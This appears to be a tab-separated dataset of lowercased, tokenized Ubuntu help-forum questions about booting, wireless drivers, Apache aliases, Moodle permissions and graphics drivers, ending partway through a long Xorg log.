388859	open/save pdf files in chromium ?	i have lubuntu 13.04 with chromium browser installed on my acer aspire one d255 netbook . how do i view , save a pdf file ? i 'm sure it 's quite simple but somehow i ca n't get it . i keep getting asked to download adobe reader but do n't want to do that . the message i get says 'your browser appears to be missing a pdf reader plugin . you can download adobe reader
388861	install ubuntu : nothing happens	i have this brand new acer laptop ( acer aspire v5-573g-54208g50akk ) . i started the preinstalled windows 8 and then changed the boot priority to usb . but the screen goes black and nothing happens . right after i chose `` install ubuntu '' or `` try ubuntu.. '' in the menu screen . i use `` universal-usb-installer-1.9.4.5 '' to create a bootable usb stick . i used this program on a different laptop before and it worked . i tried different usb sticks i tried ubuntu 12.04 lts and ubuntu 13.10 nothing helped : /
388862	i ca n't change the boot order !	i can go and and play with the boot orders all i want but my computer will always read my hard drive first . what do i do to get ubuntu on my computer ? computer info -- -- -- > http : //instagram.com/p/hrcjiqla8a/ computer info -- -- -- > http : //instagram.com/p/hwj11wla8j/ it would be great if someone could help me figure this out ! you guys rock ... .
388863	allocate users disk space ?	if possible i 'd like to allocate disk space to users . i run a large collection of users and on sign up i 'd like to include a folder limit . is there a command for this ?
388864	alias results in 404	i 'm tryiing to solve some missing icons and styles in my awstats static pages . i 'm running an ubuntu 12.04 server with several virtual hosts . below is the default apache2 config ( /ect/apache2/sites-available/default ) and in the default awstats.conf i have set the icons dir to `` /awstatsicons '' . despite all this , when i try to open any of them straight in the browser ( by following a link , for instance - http : //www.example.com/awstatsicons/other/awstat_icon6.png ) i get an error 404 . could you help me , please ? alias /awstatsclasses/ /usr/share/awstats/lib/ alias /awstatsicons/ /usr/share/awstats/icon/ alias /awstatscss/ /usr/share/awstats/css/ scriptalias /awstats/ /usr/lib/cgi-bin/ options execcgi -multiviews +symlinksifownermatch < directory `` /usr/share/awstats '' > options +indexes +multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > i have set the owner of /usr/share/awstats to www-data : www-data and the permissions to 775 .
388870	moodle instal problems	i have setup a ubuntu desktop v12.04 . i have then followed the install instructions in moodle.org . my problem is that when i copy the extracted files into the var/www/moodle folder using gksudo nautilus the permissions set for the moodle folder are not inherited . i have tried using the : sudo chmod -r 0755 /var/www/moodle also i have tried resetting the permissions again at the folder level which also does not seem to work . i need to set the owner to www-data does anyone have any idea how to do this ?
388872	running windows apps on ubuntu	will ubuntu run programs like quicken for windows , microsoft office , microsoft outlook , windows explorer , microsoft word , excel , roboform , itunes , norton or mcafee security , etc. , or can i relegate those to a virtual window , and use ubuntu separately ?
388873	problem with motorola nvg510	ever since i switched over to at & t using apt-get and updating or anything related to any of that has been unbelievably slow . ive tried going into software and updates and changing it from the main server but nothing seems to work . using firefox or chrome is fine nothing wrong with that at all . please help ! its killing me ! thanks to who ever can help !
388875	wireless card not working ( atheros 9287 )	i installed ubuntu 13.10 some days ago in my desktop , which has installed a tp-link wn881nd . the problem is that ubuntu do n't find any networks to connect , even though there 's , at least , 5 networks in my region - the other os ( windows 8 ) detects the board . is there any solution for this ? i 've been searching for a solution for weeks and no one seems to solve the problem . note : my network access is purely based on wireless , so i ca n't access the internet on ubuntu , just on the windows . info : model : tl-wn881nd chipset : atheros 9287 edit thanks to julian , now i can see some of the connections . however , the one that i use in home does n't showed up .
388880	wireless network adapter not working on ubuntu	new ubuntu user here i have a dual-boot system with windows xp and ubuntu ( i do n't remember which version exactly , but it 's fairly new ) . i have a wireless network adapter ( from cisco , connected by usb port ) that works just great on the windows side of my system , but i do n't know how to get it working on the ubuntu side . there is no problem with the adapter or the computer ( as far as i 'm concerned ) ; i 'm just not familiar enough with linux and ubuntu to get it up and running . any suggestions ?
388881	syncing ubuntuone ftp workaround	i 'm attempting to set up a dropbox-style sync with an ftp folder that i 'm using as a workaround for ubuntuone on one of my machines . background : so i 've tried to get ubuntuone working on my desktop for ages but it 's afflicted with the ipcerror in the worst way ( i 'd advise you not to offer me help in navigating that black hole ... for your own good ) . i 've tried every solution the google has to offer but to no avail . i did find , however that i could connect to ubuntuone via ftp a la this python script . that works fine , but it does n't give me a local copy of all my stuff , nor does it give me a mounted directory that i can access with all my programs ( shotwell in particular ; i use ubuntuone primarily for photo syncing ) . what i 've tried so far : to solve the local copy issue , i tried jerry-rigging my own u1/dropbox by using the above python script , curlftpfs ( a la this post ) and unison . the problem is that , for whatever reason , curlftpfs is god awful slower than death in this context ; we 're talking 5 minutes to open half a picture here . maybe i have it configured incorrectly , but i 've read a couple other complaints about it that have fallen in the same vein . anyway , unison works great in any other context , but curlftpfs slows everything down intolerably . still , unison does n't support ftp so i would seem to be stuck using curlftpfs . it 's like each of the three tricks i 'm trying to combine gets me like 66 % of they way but then chokes on the excess 98 % by which it exceeds a full solution . so , my question ... essentially can be boiled down to `` any ideas ? '' i 'm probably looking for something that would probably take one of the following forms : a way to make curlftpfs hate itself less ( much less ) under these circumstances . an alternative to unison that natively deals with syncing ftp . a way to get unison to play nice-nice with ftp . advice to stop wasting everyone 's time and take up needlepoint instead . really , any ideas would be appreciated .
388883	amd catalyst control center does n't save settings	amd catalyst control center does n't save settings i 've got the same issue ubuntu 12.04 lts catalyst control center says it is version 2.18 but i installed this from amd support pages : amd-driver-installer-catalyst-13-4-x86.x86_64.run fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7700 series opengl version string : 4.2.12217 compatibility profile context 12.104 as soon as i leave ( logout and logon again or reboot ) i lose all the monitors settings two different monitor first via hdmi 1920*1080 second via dpi 1280*1024
388885	fatal server error : no screens found	i am trying to install a new graphics card ( nvidia geforce 6800 gt ) but am having problems . whenever i boot i get to tty-1 , and startx gives me a `` fatal server error : no screens found '' . i apparently have nvidia-current and have tried removing and then re-installing but this has not affected the error . below is the output of xorg.0.log [ 32.755 ] x.org x server 1.11.3 release date : 2011-12-16 [ 32.755 ] x protocol version 11 , revision 0 [ 32.755 ] build operating system : linux 2.6.42-37-generic i686 ubuntu [ 32.755 ] current operating system : linux pcuser-system 3.2.0-57-generic # 87-ubuntu smp tue nov 12 21:38:12 utc 2013 i686 [ 32.755 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-57-generic root=uuid=36d22074-628d-4ee6-96db-8db605d1f147 ro quiet splash [ 32.755 ] build date : 16 october 2013 04:45:22pm [ 32.755 ] xorg-server 2:1.11.4-0ubuntu10.14 ( for technical support please see http : //www.ubuntu.com/support ) [ 32.755 ] current version of pixman : 0.24.4 [ 32.755 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 32.755 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 32.755 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue dec 10 20:17:05 2013 [ 32.755 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 32.755 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 32.755 ] ( == ) no layout section . using the first screen section . [ 32.755 ] ( ** ) | -- > screen `` default screen '' ( 0 ) [ 32.755 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 32.756 ] ( == ) no device specified for screen `` default screen '' . using the first device section listed . [ 32.756 ] ( ** ) | | -- > device `` default device '' [ 32.756 ] ( == ) no monitor specified for screen `` default screen '' . using a default monitor configuration . [ 32.756 ] ( == ) automatically adding devices [ 32.756 ] ( == ) automatically enabling devices [ missing fonts [ 32.756 ] entry deleted from font path . [ 32.756 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 32.756 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 32.756 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 32.756 ] ( ii ) loader magic : 0xf6e5a0 [ 32.756 ] ( ii ) module abi versions : [ 32.756 ] x.org ansi c emulation : 0.4 [ 32.756 ] x.org video driver : 11.0 [ 32.756 ] x.org xinput driver : 16.0 [ 32.756 ] x.org server extension : 6.0 [ 32.757 ] ( -- ) pci : * ( 0:2:0:0 ) 10de:06e4:196e:05cc rev 161 , mem @ 0xfb000000/16777216 , 0xd0000000/268435456 , 0xf8000000/33554432 , i/o @ 0x0000ec00/128 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 32.757 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 32.757 ] ( ii ) `` extmod '' will be loaded by default . [ 32.757 ] ( ii ) `` dbe '' will be loaded by default . [ 32.757 ] ( ii ) `` glx '' will be loaded . this was enabled by default and also specified in the config file . [ 32.757 ] ( ii ) `` record '' will be loaded by default . [ 32.757 ] ( ii ) `` dri '' will be loaded by default . [ 32.757 ] ( ii ) `` dri2 '' will be loaded by default . [ 32.757 ] ( ii ) loadmodule : `` glx '' [ 32.757 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/libglx.so [ 32.781 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 32.781 ] compiled for 4.0.2 , module version = 1.0.0 [ 32.781 ] module class : x.org server extension [ 32.781 ] ( ii ) nvidia glx module 304.88 wed mar 27 14:51:59 pdt 2013 [ 32.781 ] ( ii ) loading extension glx [ 32.781 ] ( ii ) loadmodule : `` extmod '' [ 32.802 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 32.802 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 32.802 ] compiled for 1.11.3 , module version = 1.0.0 [ 32.802 ] module class : x.org server extension [ 32.803 ] abi class : x.org server extension , version 6.0 [ 32.803 ] ( ii ) loading extension mit-screen-saver [ 32.803 ] ( ii ) loading extension xfree86-vidmodeextension [ 32.803 ] ( ii ) loading extension xfree86-dga [ 32.803 ] ( ii ) loading extension dpms [ 32.803 ] ( ii ) loading extension xvideo [ 32.803 ] ( ii ) loading extension xvideo-motioncompensation [ 32.803 ] ( ii ) loading extension x-resource [ 32.803 ] ( ii ) loadmodule : `` dbe '' [ 32.803 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 32.803 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 32.803 ] compiled for 1.11.3 , module version = 1.0.0 [ 32.803 ] module class : x.org server extension [ 32.803 ] abi class : x.org server extension , version 6.0 [ 32.803 ] ( ii ) loading extension double-buffer [ 32.803 ] ( ii ) loadmodule : `` record '' [ 32.803 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 32.803 ] ( ii ) module record : vendor= '' x.org foundation '' [ 32.803 ] compiled for 1.11.3 , module version = 1.13.0 [ 32.803 ] module class : x.org server extension [ 32.803 ] abi class : x.org server extension , version 6.0 [ 32.803 ] ( ii ) loading extension record [ 32.803 ] ( ii ) loadmodule : `` dri '' [ 32.803 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 32.803 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 32.803 ] compiled for 1.11.3 , module version = 1.0.0 [ 32.803 ] abi class : x.org server extension , version 6.0 [ 32.803 ] ( ii ) loading extension xfree86-dri [ 32.803 ] ( ii ) loadmodule : `` dri2 '' [ 32.804 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 32.804 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 32.804 ] compiled for 1.11.3 , module version = 1.2.0 [ 32.804 ] abi class : x.org server extension , version 6.0 [ 32.804 ] ( ii ) loading extension dri2 [ 32.804 ] ( == ) matched nvidia as autoconfigured driver 0 [ 32.804 ] ( == ) matched nouveau as autoconfigured driver 1 [ 32.804 ] ( == ) matched nv as autoconfigured driver 2 [ 32.804 ] ( == ) matched vesa as autoconfigured driver 3 [ 32.804 ] ( == ) matched fbdev as autoconfigured driver 4 [ 32.804 ] ( == ) assigned the driver to the xf86configlayout [ 32.804 ] ( ii ) loadmodule : `` nvidia '' [ 32.804 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/nvidia_drv.so [ 32.804 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 32.804 ] compiled for 4.0.2 , module version = 1.0.0 [ 32.804 ] module class : x.org video driver [ 32.804 ] ( ii ) loadmodule : `` nouveau '' [ 32.804 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 32.804 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 32.804 ] compiled for 1.11.3 , module version = 0.0.16 [ 32.804 ] module class : x.org video driver [ 32.804 ] abi class : x.org video driver , version 11.0 [ 32.804 ] ( ii ) loadmodule : `` nv '' [ 32.805 ] ( ww ) warning , could n't open module nv [ 32.805 ] ( ii ) unloadmodule : `` nv '' [ 32.805 ] ( ii ) unloading nv [ 32.805 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 32.805 ] ( ii ) loadmodule : `` vesa '' [ 32.805 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 32.805 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 32.805 ] compiled for 1.11.3 , module version = 2.3.0 [ 32.805 ] module class : x.org video driver [ 32.805 ] abi class : x.org video driver , version 11.0 [ 32.805 ] ( ii ) loadmodule : `` fbdev '' [ 32.805 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 32.805 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 32.805 ] compiled for 1.11.3 , module version = 0.4.2 [ 32.805 ] abi class : x.org video driver , version 11.0 [ 32.805 ] ( == ) matched nvidia as autoconfigured driver 0 [ 32.805 ] ( == ) matched nouveau as autoconfigured driver 1 [ 32.805 ] ( == ) matched nv as autoconfigured driver 2 [ 32.805 ] ( == ) matched vesa as autoconfigured driver 3 [ 32.805 ] ( == ) matched fbdev as autoconfigured driver 4 [ 32.805 ] ( == ) assigned the driver to the xf86configlayout [ 32.805 ] ( ii ) loadmodule : `` nvidia '' [ 32.805 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/nvidia_drv.so [ 32.805 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 32.805 ] compiled for 4.0.2 , module version = 1.0.0 [ 32.805 ] module class : x.org video driver [ 32.805 ] ( ii ) unloadmodule : `` nvidia '' [ 32.805 ] ( ii ) unloading nvidia [ 32.805 ] ( ii ) failed to load module `` nvidia '' ( already loaded , 15944731 ) [ 32.805 ] ( ii ) loadmodule : `` nouveau '' [ 32.806 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 32.806 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 32.806 ] compiled for 1.11.3 , module version = 0.0.16 [ 32.806 ] module class : x.org video driver [ 32.806 ] abi class : x.org video driver , version 11.0 [ 32.806 ] ( ii ) unloadmodule : `` nouveau '' [ 32.806 ] ( ii ) unloading nouveau [ 32.806 ] ( ii ) failed to load module `` nouveau '' ( already loaded , 15944731 ) [ 32.806 ] ( ii ) loadmodule : `` nv '' [ 32.806 ] ( ww ) warning , could n't open module nv [ 32.806 ] ( ii ) unloadmodule : `` nv '' [ 32.806 ] ( ii ) unloading nv [ 32.806 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 32.806 ] ( ii ) loadmodule : `` vesa '' [ 32.806 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 32.806 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 32.806 ] compiled for 1.11.3 , module version = 2.3.0 [ 32.806 ] module class : x.org video driver [ 32.806 ] abi class : x.org video driver , version 11.0 [ 32.806 ] ( ii ) unloadmodule : `` vesa '' [ 32.806 ] ( ii ) unloading vesa [ 32.806 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 32.806 ] ( ii ) loadmodule : `` fbdev '' [ 32.806 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 32.806 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 32.806 ] compiled for 1.11.3 , module version = 0.4.2 [ 32.806 ] abi class : x.org video driver , version 11.0 [ 32.806 ] ( ii ) unloadmodule : `` fbdev '' [ 32.806 ] ( ii ) unloading fbdev [ 32.806 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 32.806 ] ( ii ) nvidia dlloader x driver 304.88 wed mar 27 14:32:42 pdt 2013 [ 32.806 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 32.806 ] ( ii ) nouveau driver date : wed nov 30 18:56:54 2011 +0100 [ 32.806 ] ( ii ) nouveau driver for nvidia chipset families : [ 32.806 ] riva tnt ( nv04 ) [ 32.806 ] riva tnt2 ( nv05 ) [ 32.806 ] geforce 256 ( nv10 ) [ 32.806 ] geforce 2 ( nv11 , nv15 ) [ 32.806 ] geforce 4mx ( nv17 , nv18 ) [ 32.806 ] geforce 3 ( nv20 ) [ 32.806 ] geforce 4ti ( nv25 , nv28 ) [ 32.806 ] geforce fx ( nv3x ) [ 32.806 ] geforce 6 ( nv4x ) [ 32.806 ] geforce 7 ( g7x ) [ 32.806 ] geforce 8 ( g8x ) [ 32.807 ] geforce gtx 200 ( nva0 ) [ 32.807 ] geforce gtx 400 ( nvc0 ) [ 32.807 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 32.807 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 32.807 ] ( ++ ) using vt number 7 [ 32.808 ] ( ii ) loading sub module `` fb '' [ 32.808 ] ( ii ) loadmodule : `` fb '' [ 32.808 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 32.808 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 32.808 ] compiled for 1.11.3 , module version = 1.0.0 [ 32.808 ] abi class : x.org ansi c emulation , version 0.4 [ 32.808 ] ( ii ) loading sub module `` wfb '' [ 32.808 ] ( ii ) loadmodule : `` wfb '' [ 32.808 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 32.808 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 32.808 ] compiled for 1.11.3 , module version = 1.0.0 [ 32.808 ] abi class : x.org ansi c emulation , version 0.4 [ 32.808 ] ( ii ) loading sub module `` ramdac '' [ 32.808 ] ( ii ) loadmodule : `` ramdac '' [ 32.808 ] ( ii ) module `` ramdac '' already built-in [ 32.808 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/nvidia_drv.so [ 32.808 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 32.808 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 32.808 ] ( ww ) falling back to old probe method for vesa [ 32.808 ] ( ww ) falling back to old probe method for fbdev [ 32.808 ] ( ii ) loading sub module `` fbdevhw '' [ 32.808 ] ( ii ) loadmodule : `` fbdevhw '' [ 32.808 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 32.808 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 32.809 ] compiled for 1.11.3 , module version = 0.0.2 [ 32.809 ] abi class : x.org video driver , version 11.0 [ 32.809 ] ( ee ) open /dev/fb0 : no such file or directory [ 32.809 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen '' for depth/fbbpp 24/32 [ 32.809 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 32.809 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 32.809 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 32.809 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 32.809 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 32.809 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 33.578 ] ( ii ) nvidia ( gpu-0 ) : display ( lg electronics w2252 ( crt-0 ) ) does not support nvidia [ 33.578 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 33.579 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce 8400 gs ( g98 ) at pci:2:0:0 ( gpu-0 ) [ 33.579 ] ( -- ) nvidia ( 0 ) : memory : 524288 kbytes [ 33.579 ] ( -- ) nvidia ( 0 ) : videobios : 62.98.71.00.52 [ 33.579 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 33.579 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 33.582 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce 8400 gs at pci:2:0:0 [ 33.582 ] ( -- ) nvidia ( 0 ) : lg electronics w2252 ( crt-0 ) ( connected ) [ 33.582 ] ( -- ) nvidia ( 0 ) : crt-1 [ 33.583 ] ( -- ) nvidia ( 0 ) : dfp-0 [ 33.583 ] ( -- ) nvidia ( 0 ) : lg electronics w2252 ( crt-0 ) : 400.0 mhz maximum pixel clock [ 33.583 ] ( -- ) nvidia ( 0 ) : crt-1 : 400.0 mhz maximum pixel clock [ 33.583 ] ( -- ) nvidia ( 0 ) : dfp-0 : 330.0 mhz maximum pixel clock [ 33.583 ] ( -- ) nvidia ( 0 ) : dfp-0 : internal single link tmds [ 33.583 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 33.583 ] ( ** ) nvidia ( 0 ) : device lg electronics w2252 ( crt-0 ) ( using edid [ 33.583 ] ( ** ) nvidia ( 0 ) : frequencies has been enabled on all display devices . ) [ 33.585 ] ( == ) nvidia ( 0 ) : [ 33.585 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 33.585 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 33.585 ] ( == ) nvidia ( 0 ) : [ 33.585 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 33.585 ] ( ii ) nvidia ( 0 ) : `` crt-0 : nvidia-auto-select '' [ 33.585 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1680 x 1050 [ 33.621 ] ( -- ) nvidia ( 0 ) : dpi set to ( 87 , 83 ) ; computed from `` useediddpi '' x config [ 33.621 ] ( -- ) nvidia ( 0 ) : option [ 33.621 ] ( ii ) unloadmodule : `` nouveau '' [ 33.621 ] ( ii ) unloading nouveau [ 33.621 ] ( ii ) unloadmodule : `` vesa '' [ 33.621 ] ( ii ) unloading vesa [ 33.621 ] ( ii ) unloadmodule : `` fbdev '' [ 33.621 ] ( ii ) unloading fbdev [ 33.621 ] ( ii ) unloadmodule : `` fbdevhw '' [ 33.621 ] ( ii ) unloading fbdevhw [ 33.621 ] ( -- ) depth 24 pixmap format is 32 bpp [ 33.622 ] ( ii ) nvidia : using 768.00 mb of virtual memory for indirect memory access . [ 33.628 ] ( ii ) nvidia ( 0 ) : setting mode `` crt-0 : nvidia-auto-select '' [ 33.654 ] ( ii ) loading extension nv-glx [ 33.680 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 33.680 ] ( == ) nvidia ( 0 ) : backing store disabled [ 33.680 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 33.680 ] ( == ) nvidia ( 0 ) : dpms enabled [ 33.680 ] ( ii ) loading extension nv-control [ 33.681 ] ( ii ) loading extension xinerama [ 33.681 ] ( ii ) loading sub module `` dri2 '' [ 33.681 ] ( ii ) loadmodule : `` dri2 '' [ 33.681 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 33.681 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 33.681 ] compiled for 1.11.3 , module version = 1.2.0 [ 33.681 ] abi class : x.org server extension , version 6.0 [ 33.681 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 33.681 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 33.681 ] ( -- ) randr disabled [ 33.681 ] ( ii ) initializing built-in extension generic event extension [ 33.681 ] ( ii ) initializing built-in extension shape [ 33.681 ] ( ii ) initializing built-in extension mit-shm [ 33.681 ] ( ii ) initializing built-in extension xinputextension [ 33.681 ] ( ii ) initializing built-in extension xtest [ 33.681 ] ( ii ) initializing built-in extension big-requests [ 33.681 ] ( ii ) initializing built-in extension sync [ 33.681 ] ( ii ) initializing built-in extension xkeyboard [ 33.681 ] ( ii ) initializing built-in extension xc-misc [ 33.681 ] ( ii ) initializing built-in extension security [ 33.681 ] ( ii ) initializing built-in extension xinerama [ 33.681 ] ( ii ) initializing built-in extension xfixes [ 33.681 ] ( ii ) initializing built-in extension render [ 33.681 ] ( ii ) initializing built-in extension randr [ 33.681 ] ( ii ) initializing built-in extension composite [ 33.681 ] ( ii ) initializing built-in extension damage [ 33.681 ] ( ii ) initializing extension glx [ 33.706 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 33.708 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 33.708 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 33.708 ] ( ii ) loadmodule : `` evdev '' [ 33.708 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 33.708 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 33.708 ] compiled for 1.11.3 , module version = 2.7.0 [ 33.708 ] module class : x.org xinput driver [ 33.708 ] abi class : x.org xinput driver , version 16.0 [ 33.708 ] ( ii ) using input driver 'evdev ' for 'power button' [ 33.708 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 33.708 ] ( ** ) power button : always reports core events [ 33.708 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 33.708 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 33.708 ] ( -- ) evdev : power button : found keys [ 33.708 ] ( ii ) evdev : power button : configuring as keyboard [ 33.708 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 33.708 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 33.708 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 33.708 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 33.708 ] ( ** ) option `` xkb_layout '' `` gb '' [ 33.710 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2b4266aa55228ae7d9557a18f1965dba19850816.xkm [ 33.711 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 33.711 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 33.711 ] ( ii ) using input driver 'evdev ' for 'power button' [ 33.711 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 33.711 ] ( ** ) power button : always reports core events [ 33.711 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 33.711 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 33.711 ] ( -- ) evdev : power button : found keys [ 33.711 ] ( ii ) evdev : power button : configuring as keyboard [ 33.711 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0c:00/input/input0/event0 '' [ 33.711 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 33.711 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 33.711 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 33.711 ] ( ** ) option `` xkb_layout '' `` gb '' [ 33.711 ] ( ii ) config/udev : adding input device microsoft comfort curve keyboard 2000 ( /dev/input/event2 ) [ 33.711 ] ( ** ) microsoft comfort curve keyboard 2000 : applying inputclass `` evdev keyboard catchall '' [ 33.711 ] ( ii ) using input driver 'evdev ' for 'microsoft comfort curve keyboard 2000' [ 33.711 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ ... keyboard info ... [ 33.711 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:02.0/usb3/3-2/3-2:1.0/input/input2/event2 '' [ 33.711 ] ( ii ) xinput : adding extended input device `` microsoft comfort curve keyboard 2000 '' ( type : keyboard , id 8 ) [ 33.711 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 33.711 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 33.711 ] ( ** ) option `` xkb_layout '' `` gb '' [ 33.712 ] ( ii ) config/udev : adding input device microsoft comfort curve keyboard 2000 ( /dev/input/event3 ) [ ... keyboard info ... threshold : 4 [ 33.713 ] ( ii ) config/udev : adding input device www.tigerfly.net www.tigerfly.net ( /dev/input/event4 ) [ 33.713 ] ( ** ) www.tigerfly.net www.tigerfly.net : applying inputclass `` evdev pointer catchall '' [ 33.713 ] ( ** ) www.tigerfly.net www.tigerfly.net : applying inputclass `` evdev keyboard catchall '' [ 33.713 ] ( ii ) using input driver 'evdev ' for 'www.tigerfly.net www.tigerfly.net' [ 33.713 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 33.713 ] ( ** ) www.tigerfly.net www.tigerfly.net : always reports core events [ 33.713 ] ( ** ) evdev : www.tigerfly.net www.tigerfly.net : device : `` /dev/input/event4 '' [ ... mouse info ... ( /dev/input/js0 ) [ 33.714 ] ( ii ) no input driver specified , ignoring this device . [ 33.714 ] ( ii ) this device may have been added with another device file . [ 33.714 ] ( ii ) config/udev : adding input device www.tigerfly.net www.tigerfly.net ( /dev/input/mouse0 ) [ 33.714 ] ( ii ) no input driver specified , ignoring this device . [ 33.714 ] ( ii ) this device may have been added with another device file . [ 33.714 ] ( ii ) config/udev : adding input device hda nvidia line-out clfe ( /dev/input/event10 ) [ 